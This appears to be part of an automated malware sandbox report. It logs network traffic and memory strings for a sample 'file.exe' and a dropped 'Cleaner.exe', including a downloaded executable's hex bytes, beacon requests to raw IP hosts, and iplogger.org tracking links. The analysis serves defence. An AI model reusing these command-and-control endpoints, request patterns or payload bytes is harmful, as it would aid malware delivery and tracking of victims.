                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 Oct 2022 15:20:18 GMTServer: Apache/2.4.41 (Ubuntu)Pragma: publicExpires: 0Cache-Control: must-revalidate, post-check=0, pre-check=0Cache-Control: privateContent-Disposition: attachment; filename="soft";Content-Transfer-Encoding: binaryContent-Length: 3947920Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f1 9a e4 ea 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 e4 14 00 00 0c 00 00 00 00 00 00 a6 02 15 00 00 20 00 00 00 20 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 02 15 00 4f 00 00 00 00 20 15 00 32 09 00 00 00 00 00 00 00 00 00 00 00 28 3c 00 90 15 00 00 00 40 15 00 0c 00 00 00 38 02 15 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac e2 14 00 00 20 00 00 00 e4 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 32 09 00 00 00 20 15 00 00 0a 00 00 00 e6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 f0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 02 15 00 00 00 00 00 48 00 00 00 02 00 05 00 68 81 00 00 40 45 00 00 01 00 00 00 54 00 00 06 a8 c6 00 00 90 3b 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownTCP traffic detected without corresponding DNS query: 208.67.104.97
                  Source: unknownTCP traffic detected without corresponding DNS query: 208.67.104.97
                  Source: unknownTCP traffic detected without corresponding DNS query: 208.67.104.97
                  Source: unknownTCP traffic detected without corresponding DNS query: 208.67.104.97
                  Source: unknownTCP traffic detected without corresponding DNS query: 208.67.104.97
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: file.exe, 00000000.00000000.435842723.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst
                  Source: file.exe, 00000000.00000000.450973724.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.444182546.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.443138456.00000000009CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.436870708.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte
                  Source: file.exe, 00000000.00000000.450973724.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.444182546.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte0I/R
                  Source: file.exe, 00000000.00000000.450973724.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte3
                  Source: file.exe, 00000000.00000000.450973724.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.444182546.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.436870708.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinteS
                  Source: file.exe, 00000000.00000003.467137314.00000000009CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.31.46.167/software.php
                  Source: file.exe, 00000000.00000003.467137314.00000000009CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.31.46.167/software.phpN
                  Source: file.exe, 00000000.00000003.467137314.00000000009CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.31.46.167/software.phpR
                  Source: file.exe, 00000000.00000003.467137314.00000000009CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.31.46.167/software.phpl
                  Source: file.exe, 00000000.00000003.467137314.00000000009CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.31.46.167/software.phpll
                  Source: file.exe, 00000000.00000003.467137314.00000000009CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.31.46.167/software.phpwv
                  Source: Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                  Source: Cleaner.exe, 00000018.00000000.577997464.0000014300419000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://iplogger.org
                  Source: Cleaner.exe, 00000018.00000000.572538099.0000014300001000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.610288286.000001E431600000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: file.exe, 00000000.00000003.487110409.0000000003882000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.466439990.0000000003337000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.489749131.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.485888076.000000000388E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.487947725.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.492229793.0000000003CD8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.486830335.0000000003C6A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.492756485.000000000388C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.486546343.0000000003A7D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.490690243.000000000388E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.484088372.0000000003A50000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.491474837.0000000003888000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.485359675.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.491876169.0000000003AA4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.467076893.000000000309F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.491018465.0000000003AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
                  Source: Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: Cleaner.exe, 00000018.00000003.533706014.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com.TTFh~
                  Source: Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: Cleaner.exe, 00000018.00000003.533116835.0000014375C85000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.533033296.0000014375C85000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.532846112.0000014375C85000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.532979488.0000014375C85000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.533169670.0000014375C85000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.532782774.0000014375C85000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.532928176.0000014375C85000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.533219949.0000014375C85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                  Source: Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                  Source: Cleaner.exe, 00000018.00000003.531169581.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers0
                  Source: Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: Cleaner.exe, 00000018.00000003.533706014.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.533858147.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcC
                  Source: Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: Cleaner.exe, 00000018.00000003.536453334.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/
                  Source: Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: Cleaner.exe, 00000018.00000003.526470949.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.526193544.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.526684844.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.527372943.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: Cleaner.exe, 00000018.00000003.526470949.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.526684844.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.527372943.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/.TTCo
                  Source: Cleaner.exe, 00000018.00000003.526470949.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.526684844.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/C
                  Source: Cleaner.exe, 00000018.00000003.526193544.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Fa
                  Source: Cleaner.exe, 00000018.00000003.526684844.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.527372943.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/G.F
                  Source: Cleaner.exe, 00000018.00000003.526193544.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/S.TTFC
                  Source: Cleaner.exe, 00000018.00000003.526470949.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.527372943.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/co
                  Source: Cleaner.exe, 00000018.00000003.526470949.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.526193544.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/eC
                  Source: Cleaner.exe, 00000018.00000003.527372943.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                  Source: Cleaner.exe, 00000018.00000003.526470949.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/FC
                  Source: Cleaner.exe, 00000018.00000003.526470949.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.526684844.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.527372943.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Fa
                  Source: Cleaner.exe, 00000018.00000003.526470949.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.526684844.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.527372943.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/ywa
                  Source: Cleaner.exe, 00000018.00000003.526193544.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/o
                  Source: Cleaner.exe, 00000018.00000003.527372943.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/p
                  Source: Cleaner.exe, 00000018.00000003.526193544.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/siv
                  Source: Cleaner.exe, 00000018.00000003.527372943.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/x
                  Source: Cleaner.exe, 00000018.00000003.550498086.0000014375C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.
                  Source: Cleaner.exe, 00000018.00000003.520265815.0000014375C70000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.520285612.0000014375C70000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: Cleaner.exe, 00000018.00000003.520265815.0000014375C70000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.520285612.0000014375C70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com(
                  Source: Cleaner.exe, 00000018.00000003.527832031.0000014375C82000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: Cleaner.exe, 00000018.00000003.523021041.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: Cleaner.exe, 00000018.00000003.523021041.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kral
                  Source: Cleaner.exe, 00000018.00000003.523021041.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.krrnta
                  Source: Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: Cleaner.exe, 00000018.00000003.531169581.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de%
                  Source: Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: Cleaner.exe, 00000018.00000003.525118582.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.525017399.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.591809682.0000014376E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: Cleaner.exe, 00000018.00000003.525118582.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.525017399.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnC
                  Source: Cleaner.exe, 00000018.00000003.525118582.0000014375C60000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000003.525017399.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.
                  Source: Cleaner.exe, 00000018.00000003.525118582.0000014375C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnp.
                  Source: file.exe, 00000000.00000003.487110409.0000000003882000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.466439990.0000000003337000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.489749131.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.485888076.000000000388E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.487947725.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.492229793.0000000003CD8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.486830335.0000000003C6A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.492756485.000000000388C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.486546343.0000000003A7D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.490690243.000000000388E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.484088372.0000000003A50000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.491474837.0000000003888000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.485359675.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.491876169.0000000003AA4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.467076893.000000000309F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.491018465.0000000003AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g-cleanit.hk
                  Source: Cleaner.exe, 00000018.00000000.572538099.0000014300001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org
                  Source: Cleaner.exe, 00000018.00000000.578942897.00000143737A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1
                  Source: file.exe, 00000000.00000003.487110409.0000000003882000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.466439990.0000000003337000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.489749131.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.485888076.000000000388E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.487947725.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.492229793.0000000003CD8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.486830335.0000000003C6A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.492756485.000000000388C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.486546343.0000000003A7D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.490690243.000000000388E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.484088372.0000000003A50000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.491474837.0000000003888000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.485359675.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.491876169.0000000003AA4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.467076893.000000000309F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.491018465.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.578942897.00000143737A7000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.572538099.0000014300001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1Pz8p7
                  Source: Cleaner.exe, 00000018.00000000.577958119.000001430040E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.orgx
                  Source: Cleaner.exe, 00000018.00000000.572538099.0000014300001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
                  Source: unknownDNS traffic detected: queries for: iplogger.org
                  Source: global trafficHTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: DHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: EHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache
